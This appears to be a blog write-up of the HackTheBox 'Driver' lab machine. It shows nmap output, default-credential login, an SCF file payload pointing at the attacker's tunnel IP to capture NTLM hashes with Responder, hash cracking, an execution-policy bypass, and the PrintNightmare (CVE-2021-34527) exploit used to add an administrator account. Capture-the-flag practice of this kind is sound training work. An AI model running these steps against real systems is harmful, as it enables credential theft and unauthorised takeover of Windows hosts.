DRIVER – HACKTHEBOX

This is the write-up/Walkthrough of the DRIVER Machine from Hackthebox.

nmap scan:

80/tcp  open  http         syn-ack Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open  msrpc        syn-ack Microsoft Windows RPC
445/tcp open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

Visited port 80, asked for a username and password, tried logged in as admin:admin and it’s works after that, got the printer update firmware portal, which allows us to upload the firmware, looking for how can I exploit this, found an article about scf file attacks, click here to read.

Open responder in linux

sudo responder -I tun0

after that modify the payload, got from that website for scf file attacks

[Shell]
Command=2
IconFile=\\YOUR-TUNNEL-IP\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

after that, uploaded the okay.scf file to the portal, selecting any user and submit it, after that i got the tony user ntlm hash.

using john, crack the password, and used evil-winrm to connect to user tony and got the user flag.

after that, I found PowerShellConsole history on Tony user directory, On history, there was a command to add a printer with a specific Driver name, searching for that name, looking for exploit found, and Privilege Escalation vector.

I tried doing it using Metasploit, but it was not working, showing that “[-] Exploit aborted due to failure: bad-config: The payload should use the same architecture as the target driver”, I tried both x64 and x86 payload, but that error was from Metasploit, I think, looking forward as I know this PC is well configured for printer services, checking for the process found that spoolsv process is also running, I already know about this exploit which uses printer and spoolsv, I tried that exploit and it works, and I got the administrator.

Link to exploit: https://github.com/JohnHammond/CVE-2021-34527

Loading the script is disabled, so I have to bypass the restriction using Powershell

Get-ExecutionPolicy
Set-ExecutionPolicy bypass process
#Loading the script
. .\CVE-2021-34527.ps1

after that, added new user to directly as administrator group using this exploit.

Invoke-Nightmare -NewUser "procoder" -NewPassword "Procoder@123" -DriverName "PrintMe"

after that, logged into it as evil-winrm as user procoder, as the user is in Administrators group.

Let me know in the comment section if you face any problem.

Leave a Reply

Your email address will not be published. Required fields are marked *